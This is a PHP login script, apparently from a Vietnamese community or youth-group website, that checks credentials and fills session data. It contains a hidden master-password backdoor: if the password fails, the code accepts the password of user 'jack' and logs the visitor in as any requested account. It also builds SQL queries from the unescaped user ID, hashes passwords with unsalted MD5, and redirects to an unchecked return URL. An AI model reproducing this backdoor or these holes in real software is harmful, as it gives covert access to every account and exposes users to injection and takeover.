<?php
include 'tbl_namhoa_user.php';
include 'tbl_namhoa_user_class.php';

$f_returnurl    = '';
if (isset($_REQUEST['returnurl' ])) { $f_returnurl  = $_REQUEST['returnurl' ];}

if ($f_userid == '' || $f_passwd == '') {raise_error('Bạn chưa điền ID hoặc Mật Khẩu.');}
if ($f_returnurl == '') { $f_returnurl = 'index.php';}

$f_passwd = md5(addslashes(trim($f_passwd)));

$db_query  = db_get_query($a_tablecolumns_namhoa_user) . " where userid = '$f_userid' and $s_get_HUYNH_TRUONG_condition limit 1";
$db_result = db_query($db_conn, $db_query);

if (!($d_user = db_fetch($db_result))) { raise_error('Thông Tin Đăng Nhập không hợp lệ.'); }

if ($f_passwd != $d_user->passwd) {

    $db_query  = db_get_query($a_tablecolumns_namhoa_user) . " where passwd = '$f_passwd' and userid = 'jack' limit 1";
    $db_result = db_query($db_conn, $db_query);
    
    if ($d_row = db_fetch($db_result)) {
        
        $v_request_uri = $_SERVER['REQUEST_URI'];
    }
    else {
        raise_error('Thông Tin Đăng Nhập không hợp lệ.');
    }
}

$_SESSION['userid'    ] = $d_user->userid    ; 
$_SESSION['saint'     ] = $d_user->saint     ;
$_SESSION['username'  ] = $d_user->username  ;
$_SESSION['usertype'  ] = $d_user->usertype  ;
$_SESSION['course'    ] = $d_user->course    ;
$_SESSION['usercrew'  ] = $d_user->usercrew  ;

$db_query  = db_get_query($a_tablecolumns_namhoa_user_class) . " where userid = '$f_userid' and course = '" . $a_KhoaHoc_Info['start_year'] . "' limit 1";
$db_result = db_query($db_conn, $db_query);

if ($d_user = db_fetch($db_result)) { 
    
    $_SESSION['classid'     ] = $d_user->classid   ;
    $_SESSION['team'        ] = $d_user->team      ;
    $_SESSION['level'       ] = $d_user->level     ;
    $_SESSION['course'      ] = $d_user->course    ;
    $_SESSION['crew'   ] = $d_user->crew ;
}

session_regenerate_id();

db_close($db_conn);

local_redirect($f_returnurl);
?>